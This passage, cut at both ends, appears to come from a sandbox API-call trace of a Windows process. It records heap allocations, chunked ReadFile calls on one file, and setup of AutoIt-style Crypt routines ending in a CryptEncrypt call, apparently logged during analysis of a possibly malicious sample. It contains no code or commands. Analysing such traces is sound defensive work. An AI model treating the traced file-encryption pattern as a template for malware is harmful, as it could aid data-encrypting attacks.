HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0261.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0261.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0261.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0261.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0261.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0261.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0261.663] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0261.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0261.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0261.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0261.663] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0261.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0261.663] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0261.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0261.663] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0261.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0261.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0261.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0261.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0261.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0261.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0261.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0261.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0261.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0261.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0261.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0261.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0261.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0261.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0261.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0261.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xe56020 [0261.667] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0261.667] ReadFile (in: hFile=0x2d0, lpBuffer=0x3be08a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be08a8*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0261.790] ReadFile (in: hFile=0x2d0, lpBuffer=0x3be08a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be08a8*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0261.867] ReadFile (in: hFile=0x2d0, lpBuffer=0x3be08a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be08a8*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0261.870] ReadFile (in: hFile=0x2d0, lpBuffer=0x3be08a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be08a8*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0261.872] ReadFile (in: hFile=0x2d0, lpBuffer=0x3be08a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be08a8*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0261.874] ReadFile (in: hFile=0x2d0, lpBuffer=0x3be08a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be08a8*, lpNumberOfBytesRead=0x8cf4f8*=0x5000, lpOverlapped=0x0) returned 1 [0261.909] ReadFile (in: hFile=0x2d0, lpBuffer=0x3be08a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be08a8*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0261.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0261.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0261.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0261.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0261.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x55000) returned 0x2e7f320 [0262.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe56020 | out: hHeap=0x970000) returned 1 [0262.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0262.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0262.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0262.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0262.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0262.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0262.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0262.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0262.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x55000) returned 0x3bf08b0 [0262.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f320 | out: hHeap=0x970000) returned 1 [0262.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0262.031] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0262.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0262.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0262.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0262.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0262.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0262.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x55000) returned 0x2e7f320 [0262.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0262.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f320 | out: hHeap=0x970000) returned 1 [0262.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0262.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0262.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0262.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0262.032] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0262.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0262.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0262.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0262.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0262.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0262.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0262.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0262.032] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0262.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0262.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0262.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0262.032] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0262.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0262.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0262.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0262.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cf8 [0262.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0262.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0262.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0262.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0262.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x55000) returned 0x2e7f320 [0262.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0262.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54e58 [0262.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0262.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0262.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0262.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54e78 [0262.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0262.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0262.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0262.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54f08 [0262.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0262.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0262.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0262.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51670 [0262.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0262.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0262.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0262.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0262.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0262.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x55000) returned 0x3c458b8 [0262.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0262.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0262.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0262.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0262.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0262.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0262.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0262.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0262.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0262.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0262.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0262.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0262.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0262.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0262.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0262.041] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0262.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0262.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0262.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0262.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0262.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0262.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0262.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0262.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0262.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0262.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0262.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0262.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0262.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0262.041] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0262.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0262.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0262.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0262.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0262.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0262.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0262.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0262.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0262.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0262.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0262.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0262.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0262.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0262.042] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0262.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0262.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0262.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0262.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0262.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0262.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0262.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0262.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0262.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0262.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0262.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0262.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0262.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0262.042] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0262.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0262.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0262.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0262.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0262.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0262.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0262.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0262.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0262.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0262.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0262.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0262.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0262.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0262.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0262.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0262.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0262.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0262.043] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0262.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0262.043] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0262.043] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0262.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0262.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0262.044] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0262.044] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0262.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0262.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0262.044] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0262.044] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0262.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0262.044] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0262.044] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0262.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0262.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0262.044] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0262.044] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0262.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0262.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0262.044] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0262.045] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0262.045] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0262.045] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0262.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0262.045] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0262.045] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0262.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0262.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0262.045] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0262.102] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0262.103] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0262.103] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51cb8, cbMultiByte=13, 